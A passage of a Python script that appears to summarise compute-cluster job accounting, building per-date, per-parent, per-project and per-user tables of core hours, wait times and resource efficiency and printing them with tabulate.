'Adj Core Hrs': sum([d['projects'][p]['core_hours_adj'] for p in d['projects']]),
'%Avl': percent(sum([d['projects'][p]['core_hours_adj'] for p in d['projects']]), d['date']['core_hours']),
'%Utl': percent(sum([d['projects'][p]['core_hours_adj'] for p in d['projects']]), d['date']['max_core_hours']),
'Wait Hrs/Jobs': div(wait_hours, sum([d['projects'][p]['jobs'] for p in d['projects']])),
'Core Hrs/Wait': div(core_hours_adj, wait_hours),
'Wall %Acc': percent(wall_req_hours, wall_hours),
'Core %Eff': percent(cpu_hours, core_hours_adj),
'Mem %Eff': percent(mem_hours, mem_req_hours),
'Coproc %Eff': percent(coproc_hours, coproc_req_hours),
'Coproc Mem %Eff': percent(coproc_mem_hours, coproc_mem_req_hours),
**{ b['name']: sum([d['projects'][p]['job_size'][i] for p in d['projects']]) for i, b in enumerate(bins) },
})
totals = {
'Date': 'TOTALS',
'Parents': len({project_to_parent(p) for d in data for p in d['projects']}),
'Projects': len(set([p for d in data for p in d['projusers']])),
'Users': len(set([u for d in data for u in d['users']])),
'Jobs': sum_key(table, 'Jobs'),
'Core Hrs': sum_key(table, 'Core Hrs'),
'Adj Core Hrs': sum_key(table, 'Adj Core Hrs'),
'%Avl': percent(sum_key(table, 'Adj Core Hrs'), avail_core_hours),
'%Utl': percent(sum_key(table, 'Adj Core Hrs'), max_core_hours),
'Wait Hrs/Jobs': div(total_wait_hours, sum_key(table, 'Jobs')),
'Core Hrs/Wait': div(sum_key(table, 'Adj Core Hrs'), total_wait_hours),
'Wall %Acc': percent(total_wall_req_hours, total_wall_hours),
'Core %Eff': percent(total_cpu_hours, sum_key(table, 'Adj Core Hrs')),
'Mem %Eff': percent(total_mem_hours, total_mem_req_hours),
'Coproc %Eff': percent(total_coproc_hours, total_coproc_req_hours),
'Coproc Mem %Eff': percent(total_coproc_mem_hours, total_coproc_mem_req_hours),
**{ b['name']: sum([d[b['name']] for d in table]) for i, b in enumerate(bins) },
}
return headers, table, totals
def summarise_parentsbydate(data, parent, bins):
headers = [ 'Date', 'Users', 'Jobs', 'Core Hrs', 'Adj Core Hrs', '%Usg' ]
if args.availstats: headers.extend(['%Avl', '%Utl'])
if args.waitstats: headers.extend(['Wait Hrs/Jobs'])
headers.extend([ 'Core Hrs/Wait', 'Wall %Acc', 'Core %Eff', 'Mem %Eff' ])
if args.coprocstats: headers.extend(['Coproc %Eff', 'Coproc Mem %Eff'])
if bins: headers.extend([b['name'] for b in bins])
avail_core_hours = sum([d['date']['core_hours'] for d in data])
max_core_hours = sum([d['date']['max_core_hours'] for d in data])
total_core_hours_adj = 0
total_cpu_hours = 0
total_mem_hours = 0
total_mem_req_hours = 0
total_wait_hours = 0
total_wall_hours = 0
total_wall_req_hours = 0
total_coproc_hours = 0
total_coproc_req_hours = 0
total_coproc_mem_hours = 0
total_coproc_mem_req_hours = 0
table = []
for d in data:
if parent in d['parents']:
core_hours_adj = sum([d['parents'][p]['core_hours_adj'] for p in d['parents']])
total_core_hours_adj += core_hours_adj
total_cpu_hours += d['parents'][parent]['cpu_hours']
total_mem_hours += d['parents'][parent]['mem_hours']
total_mem_req_hours += d['parents'][parent]['mem_req_hours']
total_wait_hours += d['parents'][parent]['wait_hours']
total_wall_hours += d['parents'][parent]['wall_hours']
total_wall_req_hours += d['parents'][parent]['wall_req_hours']
total_coproc_hours += d['parents'][parent]['coproc_hours']
total_coproc_req_hours += d['parents'][parent]['coproc_req_hours']
total_coproc_mem_hours += d['parents'][parent]['coproc_mem_hours']
total_coproc_mem_req_hours += d['parents'][parent]['coproc_mem_req_hours']
table.append({
'Date': d['date']['name'],
'Users': d['parents'][parent]['users'],
'Jobs': d['parents'][parent]['jobs'],
'Core Hrs': d['parents'][parent]['core_hours'],
'Adj Core Hrs': d['parents'][parent]['core_hours_adj'],
'%Usg': percent(d['parents'][parent]['core_hours_adj'], core_hours_adj),
'%Avl': percent(d['parents'][parent]['core_hours_adj'], d['date']['core_hours']),
'%Utl': percent(d['parents'][parent]['core_hours_adj'], d['date']['max_core_hours']),
'Wait Hrs/Jobs': div(d['parents'][parent]['wait_hours'], d['parents'][parent]['jobs']),
'Core Hrs/Wait': div(d['parents'][parent]['core_hours_adj'], d['parents'][parent]['wait_hours']),
'Wall %Acc': percent(d['parents'][parent]['wall_req_hours'], d['parents'][parent]['wall_hours']),
'Core %Eff': percent(d['parents'][parent]['cpu_hours'], d['parents'][parent]['core_hours_adj']),
'Mem %Eff': percent(d['parents'][parent]['mem_hours'], d['parents'][parent]['mem_req_hours']),
'Coproc %Eff': percent(d['parents'][parent]['coproc_hours'], d['parents'][parent]['coproc_req_hours']),
'Coproc Mem %Eff': percent(d['parents'][parent]['coproc_mem_hours'], d['parents'][parent]['coproc_mem_req_hours']),
**{ b['name']: d['parents'][parent]['job_size'][i] for i, b in enumerate(bins) },
})
else:
table.append({
'Date': d['date']['name'],
'Users': 0,
'Jobs': 0,
'Core Hrs': 0,
'Adj Core Hrs': 0,
'%Usg': percent(0, 0),
'%Avl': percent(0, 0),
'%Utl': percent(0, 0),
'Wait Hrs/Jobs': 0,
'Core Hrs/Wait': 0,
'Wall %Acc': percent(0, 0),
'Core %Eff': percent(0, 0),
'Mem %Eff': percent(0, 0),
'Coproc %Eff': percent(0, 0),
'Coproc Mem %Eff': percent(0, 0),
**{ b['name']: 0 for i, b in enumerate(bins) },
})
totals = {
'Date': 'TOTALS',
'Users': len(set([u for d in data for prj in d['projusers'] if project_to_parent(prj) == parent for u in d['projusers'][prj]])),
'Jobs': sum_key(table, 'Jobs'),
'Core Hrs': sum_key(table, 'Core Hrs'),
'Adj Core Hrs': sum_key(table, 'Adj Core Hrs'),
'%Usg': percent(sum_key(table, 'Adj Core Hrs'), total_core_hours_adj),
'%Avl': percent(sum_key(table, 'Adj Core Hrs'), avail_core_hours),
'%Utl': percent(sum_key(table, 'Adj Core Hrs'), max_core_hours),
'Wait Hrs/Jobs': div(total_wait_hours, sum_key(table, 'Jobs')),
'Core Hrs/Wait': div(sum_key(table, 'Adj Core Hrs'), total_wait_hours),
'Wall %Acc': percent(total_wall_req_hours, total_wall_hours),
'Core %Eff': percent(total_cpu_hours, sum_key(table, 'Adj Core Hrs')),
'Mem %Eff': percent(total_mem_hours, total_mem_req_hours),
'Coproc %Eff': percent(total_coproc_hours, total_coproc_req_hours),
'Coproc Mem %Eff': percent(total_coproc_mem_hours, total_coproc_mem_req_hours),
**{ b['name']: sum([d[b['name']] for d in table]) for i, b in enumerate(bins) },
}
return headers, table, totals
def summarise_projectsbydate(data, project, bins):
headers = [ 'Date', 'Users', 'Jobs', 'Core Hrs', 'Adj Core Hrs', '%Usg' ]
if args.availstats: headers.extend(['%Avl', '%Utl'])
if args.waitstats: headers.extend(['Wait Hrs/Jobs'])
headers.extend([ 'Core Hrs/Wait', 'Wall %Acc', 'Core %Eff', 'Mem %Eff' ])
if args.coprocstats: headers.extend(['Coproc %Eff', 'Coproc Mem %Eff'])
if bins: headers.extend([b['name'] for b in bins])
avail_core_hours = sum([d['date']['core_hours'] for d in data])
max_core_hours = sum([d['date']['max_core_hours'] for d in data])
total_core_hours_adj = 0
total_cpu_hours = 0
total_mem_hours = 0
total_mem_req_hours = 0
total_wait_hours = 0
total_wall_hours = 0
total_wall_req_hours = 0
total_coproc_hours = 0
total_coproc_req_hours = 0
total_coproc_mem_hours = 0
total_coproc_mem_req_hours = 0
table = []
for d in data:
if project in d['projusers']:
core_hours_adj = sum([d['projects'][p]['core_hours_adj'] for p in d['projects']])
total_core_hours_adj += core_hours_adj
total_cpu_hours += d['projects'][project]['cpu_hours']
total_mem_hours += d['projects'][project]['mem_hours']
total_mem_req_hours += d['projects'][project]['mem_req_hours']
total_wait_hours += d['projects'][project]['wait_hours']
total_wall_hours += d['projects'][project]['wall_hours']
total_wall_req_hours += d['projects'][project]['wall_req_hours']
total_coproc_hours += d['projects'][project]['coproc_hours']
total_coproc_req_hours += d['projects'][project]['coproc_req_hours']
total_coproc_mem_hours += d['projects'][project]['coproc_mem_hours']
total_coproc_mem_req_hours += d['projects'][project]['coproc_mem_req_hours']
table.append({
'Date': d['date']['name'],
'Users': d['projects'][project]['users'],
'Jobs': d['projects'][project]['jobs'],
'Core Hrs': d['projects'][project]['core_hours'],
'Adj Core Hrs': d['projects'][project]['core_hours_adj'],
'%Usg': percent(d['projects'][project]['core_hours_adj'], core_hours_adj),
'%Avl': percent(d['projects'][project]['core_hours_adj'], d['date']['core_hours']),
'%Utl': percent(d['projects'][project]['core_hours_adj'], d['date']['max_core_hours']),
'Wait Hrs/Jobs': div(d['projects'][project]['wait_hours'], d['projects'][project]['jobs']),
'Core Hrs/Wait': div(d['projects'][project]['core_hours_adj'], d['projects'][project]['wait_hours']),
'Wall %Acc': percent(d['projects'][project]['wall_req_hours'], d['projects'][project]['wall_hours']),
'Core %Eff': percent(d['projects'][project]['cpu_hours'], d['projects'][project]['core_hours_adj']),
'Mem %Eff': percent(d['projects'][project]['mem_hours'], d['projects'][project]['mem_req_hours']),
'Coproc %Eff': percent(d['projects'][project]['coproc_hours'], d['projects'][project]['coproc_req_hours']),
'Coproc Mem %Eff': percent(d['projects'][project]['coproc_mem_hours'], d['projects'][project]['coproc_mem_req_hours']),
**{ b['name']: d['projects'][project]['job_size'][i] for i, b in enumerate(bins) },
})
else:
table.append({
'Date': d['date']['name'],
'Users': 0,
'Jobs': 0,
'Core Hrs': 0,
'Adj Core Hrs': 0,
'%Usg': percent(0, 0),
'%Avl': percent(0, 0),
'%Utl': percent(0, 0),
'Wait Hrs/Jobs': 0,
'Core Hrs/Wait': 0,
'Wall %Acc': percent(0, 0),
'Core %Eff': percent(0, 0),
'Mem %Eff': percent(0, 0),
'Coproc %Eff': percent(0, 0),
'Coproc Mem %Eff': percent(0, 0),
**{ b['name']: 0 for i, b in enumerate(bins) },
})
totals = {
'Date': 'TOTALS',
'Users': len(set([u for d in data for u in d['projusers'].get(project, [])])),
'Jobs': sum_key(table, 'Jobs'),
'Core Hrs': sum_key(table, 'Core Hrs'),
'Adj Core Hrs': sum_key(table, 'Adj Core Hrs'),
'%Usg': percent(sum_key(table, 'Adj Core Hrs'), total_core_hours_adj),
'%Avl': percent(sum_key(table, 'Adj Core Hrs'), avail_core_hours),
'%Utl': percent(sum_key(table, 'Adj Core Hrs'), max_core_hours),
'Wait Hrs/Jobs': div(total_wait_hours, sum_key(table, 'Jobs')),
'Core Hrs/Wait': div(sum_key(table, 'Adj Core Hrs'), total_wait_hours),
'Wall %Acc': percent(total_wall_req_hours, total_wall_hours),
'Core %Eff': percent(total_cpu_hours, sum_key(table, 'Adj Core Hrs')),
'Mem %Eff': percent(total_mem_hours, total_mem_req_hours),
'Coproc %Eff': percent(total_coproc_hours, total_coproc_req_hours),
'Coproc Mem %Eff': percent(total_coproc_mem_hours, total_coproc_mem_req_hours),
**{ b['name']: sum([d[b['name']] for d in table]) for i, b in enumerate(bins) },
}
return headers, table, totals
def summarise_usersbydate(data, user, bins):
headers = [ 'Date', 'Jobs', 'Core Hrs', 'Adj Core Hrs', '%Usg' ]
if args.availstats: headers.extend(['%Avl', '%Utl'])
if args.waitstats: headers.extend(['Wait Hrs/Jobs'])
headers.extend([ 'Core Hrs/Wait', 'Wall %Acc', 'Core %Eff', 'Mem %Eff' ])
if args.coprocstats: headers.extend(['Coproc %Eff', 'Coproc Mem %Eff'])
if bins: headers.extend([b['name'] for b in bins])
avail_core_hours = sum([d['date']['core_hours'] for d in data])
max_core_hours = sum([d['date']['max_core_hours'] for d in data])
total_core_hours_adj = 0
total_cpu_hours = 0
total_mem_hours = 0
total_mem_req_hours = 0
total_wait_hours = 0
total_wall_hours = 0
total_wall_req_hours = 0
total_coproc_hours = 0
total_coproc_req_hours = 0
total_coproc_mem_hours = 0
total_coproc_mem_req_hours = 0
table = []
for d in data:
if user in d['users']:
core_hours_adj = sum([d['users'][u]['core_hours_adj'] for u in d['users']])
total_core_hours_adj += core_hours_adj
total_cpu_hours += d['users'][user]['cpu_hours']
total_mem_hours += d['users'][user]['mem_hours']
total_mem_req_hours += d['users'][user]['mem_req_hours']
total_wait_hours += d['users'][user]['wait_hours']
total_wall_hours += d['users'][user]['wall_hours']
total_wall_req_hours += d['users'][user]['wall_req_hours']
total_coproc_hours += d['users'][user]['coproc_hours']
total_coproc_req_hours += d['users'][user]['coproc_req_hours']
total_coproc_mem_hours += d['users'][user]['coproc_mem_hours']
total_coproc_mem_req_hours += d['users'][user]['coproc_mem_req_hours']
table.append({
'Date': d['date']['name'],
'Jobs': d['users'][user]['jobs'],
'Core Hrs': d['users'][user]['core_hours'],
'Adj Core Hrs': d['users'][user]['core_hours_adj'],
'%Usg': percent(d['users'][user]['core_hours_adj'], core_hours_adj),
'%Avl': percent(d['users'][user]['core_hours_adj'], d['date']['core_hours']),
'%Utl': percent(d['users'][user]['core_hours_adj'], d['date']['max_core_hours']),
'Wait Hrs/Jobs': div(d['users'][user]['wait_hours'], d['users'][user]['jobs']),
'Core Hrs/Wait': div(d['users'][user]['core_hours_adj'], d['users'][user]['wait_hours']),
'Wall %Acc': percent(d['users'][user]['wall_req_hours'], d['users'][user]['wall_hours']),
'Core %Eff': percent(d['users'][user]['cpu_hours'], d['users'][user]['core_hours_adj']),
'Mem %Eff': percent(d['users'][user]['mem_hours'], d['users'][user]['mem_req_hours']),
'Coproc %Eff': percent(d['users'][user]['coproc_hours'], d['users'][user]['coproc_req_hours']),
'Coproc Mem %Eff': percent(d['users'][user]['coproc_mem_hours'], d['users'][user]['coproc_mem_req_hours']),
**{ b['name']: d['users'][user]['job_size'][i] for i, b in enumerate(bins) },
})
else:
table.append({
'Date': d['date']['name'],
'Jobs': 0,
'Core Hrs': 0,
'Adj Core Hrs': 0,
'%Usg': percent(0, 0),
'%Avl': percent(0, 0),
'%Utl': percent(0, 0),
'Wait Hrs/Jobs': 0,
'Core Hrs/Wait': 0,
'Wall %Acc': percent(0, 0),
'Core %Eff': percent(0, 0),
'Mem %Eff': percent(0, 0),
'Coproc %Eff': percent(0, 0),
'Coproc Mem %Eff': percent(0, 0),
**{ b['name']: 0 for i, b in enumerate(bins) },
})
totals = {
'Date': 'TOTALS',
'Jobs': sum_key(table, 'Jobs'),
'Core Hrs': sum_key(table, 'Core Hrs'),
'Adj Core Hrs': sum_key(table, 'Adj Core Hrs'),
'%Usg': percent(sum_key(table, 'Adj Core Hrs'), total_core_hours_adj),
'%Avl': percent(sum_key(table, 'Adj Core Hrs'), avail_core_hours),
'%Utl': percent(sum_key(table, 'Adj Core Hrs'), max_core_hours),
'Wait Hrs/Jobs': div(total_wait_hours, sum_key(table, 'Jobs')),
'Core Hrs/Wait': div(sum_key(table, 'Adj Core Hrs'), total_wait_hours),
'Wall %Acc': percent(total_wall_req_hours, total_wall_hours),
'Core %Eff': percent(total_cpu_hours, sum_key(table, 'Adj Core Hrs')),
'Mem %Eff': percent(total_mem_hours, total_mem_req_hours),
'Coproc %Eff': percent(total_coproc_hours, total_coproc_req_hours),
'Coproc Mem %Eff': percent(total_coproc_mem_hours, total_coproc_mem_req_hours),
**{ b['name']: sum([d[b['name']] for d in table]) for i, b in enumerate(bins) },
}
return headers, table, totals
def summarise_parents(data, bins):
headers = [ 'Parent', 'Users', 'Jobs', 'Core Hrs', 'Adj Core Hrs', '%Usg' ]
if args.availstats: headers.extend(['%Avl', '%Utl'])
if args.waitstats: headers.extend(['Wait Hrs/Jobs'])
headers.extend([ 'Core Hrs/Wait', 'Wall %Acc', 'Core %Eff', 'Mem %Eff' ])
if args.coprocstats: headers.extend(['Coproc %Eff', 'Coproc Mem %Eff'])
if bins: headers.extend([b['name'] for b in bins])
core_hours_adj = sum([data['parents'][p]['core_hours_adj'] for p in data['parents']])
table = []
for parent, d in sorted(data['parents'].items(), key=lambda item: item[1]['core_hours_adj'], reverse=True):
table.append({
'Parent': parent,
'Users': d['users'],
'Jobs': d['jobs'],
'Core Hrs': d['core_hours'],
'Adj Core Hrs': d['core_hours_adj'],
'%Usg': percent(d['core_hours_adj'], core_hours_adj),
'%Avl': percent(d['core_hours_adj'], data['date']['core_hours']),
'%Utl': percent(d['core_hours_adj'], data['date']['max_core_hours']),
'Wait Hrs/Jobs': div(d['wait_hours'], d['jobs']),
'Core Hrs/Wait': div(d['core_hours_adj'], d['wait_hours']),
'Wall %Acc': percent(d['wall_req_hours'], d['wall_hours']),
'Core %Eff': percent(d['cpu_hours'], d['core_hours_adj']),
'Mem %Eff': percent(d['mem_hours'], d['mem_req_hours']),
'Coproc %Eff': percent(d['coproc_hours'], d['coproc_req_hours']),
'Coproc Mem %Eff': percent(d['coproc_mem_hours'], d['coproc_mem_req_hours']),
**{ b['name']: d['job_size'][i] for i, b in enumerate(bins) },
}),
totals = {
'Parent': 'TOTALS',
'Users': len(data['users']),
'Jobs': sum_key(table, 'Jobs'),
'Core Hrs': sum_key(table, 'Core Hrs'),
'Adj Core Hrs': sum_key(table, 'Adj Core Hrs'),
'%Usg': percent(sum_key(table, 'Adj Core Hrs'), core_hours_adj),
'%Avl': percent(sum_key(table, 'Adj Core Hrs'), data['date']['core_hours']),
'%Utl': percent(sum_key(table, 'Adj Core Hrs'), data['date']['max_core_hours']),
'Wait Hrs/Jobs': div(sum([data['parents'][p]['wait_hours'] for p in data['parents']]), sum_key(table, 'Jobs')),
'Core Hrs/Wait': div(sum_key(table, 'Adj Core Hrs'), sum([data['parents'][p]['wait_hours'] for p in data['parents']])),
'Wall %Acc': percent(sum([data['parents'][p]['wall_req_hours'] for p in data['parents']]), sum([data['parents'][p]['wall_hours'] for p in data['parents']])),
'Core %Eff': percent(sum([data['parents'][p]['cpu_hours'] for p in data['parents']]), sum_key(table, 'Adj Core Hrs')),
'Mem %Eff': percent(sum([data['parents'][p]['mem_hours'] for p in data['parents']]), sum([data['parents'][p]['mem_req_hours'] for p in data['parents']])),
'Coproc %Eff': percent(sum([data['parents'][p]['coproc_hours'] for p in data['parents']]), sum([data['parents'][p]['coproc_req_hours'] for p in data['parents']])),
'Coproc Mem %Eff': percent(sum([data['parents'][p]['coproc_mem_hours'] for p in data['parents']]), sum([data['parents'][p]['coproc_mem_req_hours'] for p in data['parents']])),
**{ b['name']: sum([d[b['name']] for d in table]) for i, b in enumerate(bins) },
}
return headers, table, totals
def summarise_projects(data, bins):
headers = [ 'Project', 'Parent', 'Users', 'Jobs', 'Core Hrs', 'Adj Core Hrs', '%Usg' ]
if args.availstats: headers.extend(['%Avl', '%Utl'])
if args.waitstats: headers.extend(['Wait Hrs/Jobs'])
headers.extend([ 'Core Hrs/Wait', 'Wall %Acc', 'Core %Eff', 'Mem %Eff' ])
if args.coprocstats: headers.extend(['Coproc %Eff', 'Coproc Mem %Eff'])
if bins: headers.extend([b['name'] for b in bins])
core_hours_adj = sum([data['projects'][p]['core_hours_adj'] for p in data['projects']])
table = []
for project, d in sorted(data['projects'].items(), key=lambda item: item[1]['core_hours_adj'], reverse=True):
table.append({
'Project': project,
'Parent': project_to_parent(project),
'Users': d['users'],
'Jobs': d['jobs'],
'Core Hrs': d['core_hours'],
'Adj Core Hrs': d['core_hours_adj'],
'%Usg': percent(d['core_hours_adj'], core_hours_adj),
'%Avl': percent(d['core_hours_adj'], data['date']['core_hours']),
'%Utl': percent(d['core_hours_adj'], data['date']['max_core_hours']),
'Wait Hrs/Jobs': div(d['wait_hours'], d['jobs']),
'Core Hrs/Wait': div(d['core_hours_adj'], d['wait_hours']),
'Wall %Acc': percent(d['wall_req_hours'], d['wall_hours']),
'Core %Eff': percent(d['cpu_hours'], d['core_hours_adj']),
'Mem %Eff': percent(d['mem_hours'], d['mem_req_hours']),
'Coproc %Eff': percent(d['coproc_hours'], d['coproc_req_hours']),
'Coproc Mem %Eff': percent(d['coproc_mem_hours'], d['coproc_mem_req_hours']),
**{ b['name']: d['job_size'][i] for i, b in enumerate(bins) },
}),
totals = {
'Project': 'TOTALS',
'Parent': '-',
'Users': len(data['users']),
'Jobs': sum_key(table, 'Jobs'),
'Core Hrs': sum_key(table, 'Core Hrs'),
'Adj Core Hrs': sum_key(table, 'Adj Core Hrs'),
'%Usg': percent(sum_key(table, 'Adj Core Hrs'), core_hours_adj),
'%Avl': percent(sum_key(table, 'Adj Core Hrs'), data['date']['core_hours']),
'%Utl': percent(sum_key(table, 'Adj Core Hrs'), data['date']['max_core_hours']),
'Wait Hrs/Jobs': div(sum([data['projects'][p]['wait_hours'] for p in data['projects']]), sum_key(table, 'Jobs')),
'Core Hrs/Wait': div(sum_key(table, 'Adj Core Hrs'), sum([data['projects'][p]['wait_hours'] for p in data['projects']])),
'Wall %Acc': percent(sum([data['projects'][p]['wall_req_hours'] for p in data['projects']]), sum([data['projects'][p]['wall_hours'] for p in data['projects']])),
'Core %Eff': percent(sum([data['projects'][p]['cpu_hours'] for p in data['projects']]), sum_key(table, 'Adj Core Hrs')),
'Mem %Eff': percent(sum([data['projects'][p]['mem_hours'] for p in data['projects']]), sum([data['projects'][p]['mem_req_hours'] for p in data['projects']])),
'Coproc %Eff': percent(sum([data['projects'][p]['coproc_hours'] for p in data['projects']]), sum([data['projects'][p]['coproc_req_hours'] for p in data['projects']])),
'Coproc Mem %Eff': percent(sum([data['projects'][p]['coproc_mem_hours'] for p in data['projects']]), sum([data['projects'][p]['coproc_mem_req_hours'] for p in data['projects']])),
**{ b['name']: sum([d[b['name']] for d in table]) for i, b in enumerate(bins) },
}
return headers, table, totals
def summarise_users(data, bins):
headers = [ 'Usr', 'Project(s)', 'Jobs', 'Core Hrs', 'Adj Core Hrs', '%Usg' ]
if args.availstats: headers.extend(['%Avl', '%Utl'])
if args.waitstats: headers.extend(['Wait Hrs/Jobs'])
headers.extend([ 'Core Hrs/Wait', 'Wall %Acc', 'Core %Eff', 'Mem %Eff' ])
if args.coprocstats: headers.extend(['Coproc %Eff', 'Coproc Mem %Eff'])
if bins: headers.extend([b['name'] for b in bins])
core_hours_adj = sum([data['users'][u]['core_hours_adj'] for u in data['users']])
table = []
count = 0
for user, d in sorted(data['users'].items(), key=lambda item: item[1]['core_hours_adj'], reverse=True):
count += 1
if count > args.limitusers: break
table.append({
'Usr': user,
'Project(s)': ",".join(sorted([o for o in data['projusers'] for u in data['projusers'][o] if u == user])),
'Jobs': d['jobs'],
'Core Hrs': d['core_hours'],
'Adj Core Hrs': d['core_hours_adj'],
'%Usg': percent(d['core_hours_adj'], core_hours_adj),
'%Avl': percent(d['core_hours_adj'], data['date']['core_hours']),
'%Utl': percent(d['core_hours_adj'], data['date']['max_core_hours']),
'Wait Hrs/Jobs': div(d['wait_hours'], d['jobs']),
'Core Hrs/Wait': div(d['core_hours_adj'], d['wait_hours']),
'Wall %Acc': percent(d['wall_req_hours'], d['wall_hours']),
'Core %Eff': percent(d['cpu_hours'], d['core_hours_adj']),
'Mem %Eff': percent(d['mem_hours'], d['mem_req_hours']),
'Coproc %Eff': percent(d['coproc_hours'], d['coproc_req_hours']),
'Coproc Mem %Eff': percent(d['coproc_mem_hours'], d['coproc_mem_req_hours']),
**{ b['name']: d['job_size'][i] for i, b in enumerate(bins) },
})
totals = {
'Usr': 'TOTALS',
'Project(s)': '-',
'Jobs': sum_key(table, 'Jobs'),
'Core Hrs': sum_key(table, 'Core Hrs'),
'Adj Core Hrs': sum_key(table, 'Adj Core Hrs'),
'%Usg': percent(sum_key(table, 'Adj Core Hrs'), core_hours_adj),
'%Avl': percent(sum_key(table, 'Adj Core Hrs'), data['date']['core_hours']),
'%Utl': percent(sum_key(table, 'Adj Core Hrs'), data['date']['max_core_hours']),
'Wait Hrs/Jobs': div(sum([data['users'][u]['wait_hours'] for u in data['users']]), sum_key(table, 'Jobs')),
'Core Hrs/Wait': div(sum_key(table, 'Adj Core Hrs'), sum([data['users'][u]['wait_hours'] for u in data['users']])),
'Wall %Acc': percent(sum([data['users'][u]['wall_req_hours'] for u in data['users']]), sum([data['users'][u]['wall_hours'] for u in data['users']])),
'Core %Eff': percent(sum([data['users'][u]['cpu_hours'] for u in data['users']]), sum_key(table, 'Adj Core Hrs')),
'Mem %Eff': percent(sum([data['users'][u]['mem_hours'] for u in data['users']]), sum([data['users'][u]['mem_req_hours'] for u in data['users']])),
'Coproc %Eff': percent(sum([data['users'][u]['coproc_hours'] for u in data['users']]), sum([data['users'][u]['coproc_req_hours'] for u in data['users']])),
'Coproc Mem %Eff': percent(sum([data['users'][u]['coproc_mem_hours'] for u in data['users']]), sum([data['users'][u]['coproc_mem_req_hours'] for u in data['users']])),
**{ b['name']: sum([d[b['name']] for d in table]) for i, b in enumerate(bins) },
}
return headers, table, totals
def summarise_project(data, project, bins):
headers = [ 'Usr', 'Jobs', 'Core Hrs', 'Adj Core Hrs', '%Usg' ]
if args.availstats: headers.extend(['%Avl', '%Utl'])
if args.waitstats: headers.extend(['Wait Hrs/Jobs'])
headers.extend([ 'Core Hrs/Wait', 'Wall %Acc', 'Core %Eff', 'Mem %Eff' ])
if args.coprocstats: headers.extend(['Coproc %Eff', 'Coproc Mem %Eff'])
if bins: headers.extend([b['name'] for b in bins])
core_hours_adj = sum([data['projusers'][project][u]['core_hours_adj'] for u in data['projusers'][project]])
table = []
count = 0
for user, d in sorted(data['projusers'][project].items(), key=lambda item: item[1]['core_hours_adj'], reverse=True):
count += 1
if count > args.limitusers: break
table.append({
'Usr': user,
'Jobs': d['jobs'],
'Core Hrs': d['core_hours'],
'Adj Core Hrs': d['core_hours_adj'],
'%Usg': percent(d['core_hours_adj'], core_hours_adj),
'%Avl': percent(d['core_hours_adj'], data['date']['core_hours']),
'%Utl': percent(d['core_hours_adj'], data['date']['max_core_hours']),
'Wait Hrs/Jobs': div(d['wait_hours'], d['jobs']),
'Core Hrs/Wait': div(d['core_hours_adj'], d['wait_hours']),
'Wall %Acc': percent(d['wall_req_hours'], d['wall_hours']),
'Core %Eff': percent(d['cpu_hours'], d['core_hours_adj']),
'Mem %Eff': percent(d['mem_hours'], d['mem_req_hours']),
'Coproc %Eff': percent(d['coproc_hours'], d['coproc_req_hours']),
'Coproc Mem %Eff': percent(d['coproc_mem_hours'], d['coproc_mem_req_hours']),
**{ b['name']: d['job_size'][i] for i, b in enumerate(bins) },
})
totals = {
'Usr': 'TOTALS',
'Jobs': sum_key(table, 'Jobs'),
'Core Hrs': sum_key(table, 'Core Hrs'),
'Adj Core Hrs': sum_key(table, 'Adj Core Hrs'),
'%Usg': percent(sum_key(table, 'Adj Core Hrs'), core_hours_adj),
'%Avl': percent(sum_key(table, 'Adj Core Hrs'), data['date']['core_hours']),
'%Utl': percent(sum_key(table, 'Adj Core Hrs'), data['date']['max_core_hours']),
'Wait Hrs/Jobs': div(sum([data['projusers'][project][u]['wait_hours'] for u in data['projusers'][project]]), sum_key(table, 'Jobs')),
'Core Hrs/Wait': div(sum_key(table, 'Adj Core Hrs'), sum([data['projusers'][project][u]['wait_hours'] for u in data['projusers'][project]])),
'Wall %Acc': percent(sum([data['projusers'][project][u]['wall_req_hours'] for u in data['projusers'][project]]), sum([data['projusers'][project][u]['wall_hours'] for u in data['projusers'][project]])),
'Core %Eff': percent(sum([data['projusers'][project][u]['cpu_hours'] for u in data['projusers'][project]]), sum_key(table, 'Adj Core Hrs')),
'Mem %Eff': percent(sum([data['projusers'][project][u]['mem_hours'] for u in data['projusers'][project]]), sum([data['projusers'][project][u]['mem_req_hours'] for u in data['projusers'][project]])),
'Coproc %Eff': percent(sum([data['projusers'][project][u]['coproc_hours'] for u in data['projusers'][project]]), sum([data['projusers'][project][u]['coproc_req_hours'] for u in data['projusers'][project]])),
'Coproc Mem %Eff': percent(sum([data['projusers'][project][u]['coproc_mem_hours'] for u in data['projusers'][project]]), sum([data['projusers'][project][u]['coproc_mem_req_hours'] for u in data['projusers'][project]])),
**{ b['name']: sum([d[b['name']] for d in table]) for i, b in enumerate(bins) },
}
return headers, table, totals
def print_table(headers, data, totals):
if len(headers) != len(set(headers)):
print("ERROR: cannot have multiple columns with same name", headers)
# Construct data for table
tab_data = []
for d in data:
tab_data.append([d[column] for column in headers])
if totals:
tab_data.append([totals[column] for column in headers])
# Attempt to promote all elements in table to floats,
# in order to show thousands separator
for row in tab_data:
for (column, value) in enumerate(row):
try:
row[column] = float(value)
except:
None
if args.nocommas:
floatfmt=".0f"
else:
floatfmt=",.0f"
print(tabulate(tab_data, headers=headers, floatfmt=floatfmt),"\n")
def print_summary(data, reports, bins):
print("Fields:")
print("- Adj *: figure adjusted to account for large memory requests")
print("- %Usg: proportion of used core hours")
if args.availstats:
print("- %Avl: proportion of available core hours")
print("- %Utl: proportion of max possible core hours")
if args.waitstats:
print("- Wait Hrs/Jobs: sum(queuing hours) / num jobs)")
print("- Core Hrs/Wait: sum(adj core hours) / sum(elapsed hours from submit to finish)")
print("- Wall %Acc: accuracy of user h_rt request (100% == perfect, 200% == used half requested time)")
print("- %Eff: efficiency - how much of a allocated resource was actually used")
print("- Numbers: how many core hours were clocked up by jobs with that number of cores")
print("")
if 'all' in reports or 'totalsbydate' in reports:
print("=======")
print("Totals:")
print("=======\n")
print_table(*summarise_totalsbydate(data, bins))
if 'all' in reports or 'parentsbydate' in reports:
print("================")
print("Parents by date:")
print("================\n")
for parent in sorted(set([p for d in data for p in d['parents']])):
print("Parent:", parent)
print_table(*summarise_parentsbydate(data, parent, bins))
if 'all' in reports or 'projectsbydate' in reports:
print("=================")
print("Projects by date:")
print("=================\n")
for project in sorted(set([p for d in data for p in d['projusers']])):
print("Project:", project)
print_table(*summarise_projectsbydate(data, project, bins))
if 'all' in reports or 'parents' in reports:
print("============")
print("Top parents:")
print("============\n")
for d in data:
print("Period:", d['date']['name'],"\n")
print_table(*summarise_parents(d, bins))
if 'all' in reports or 'projects' in reports:
print("=============")
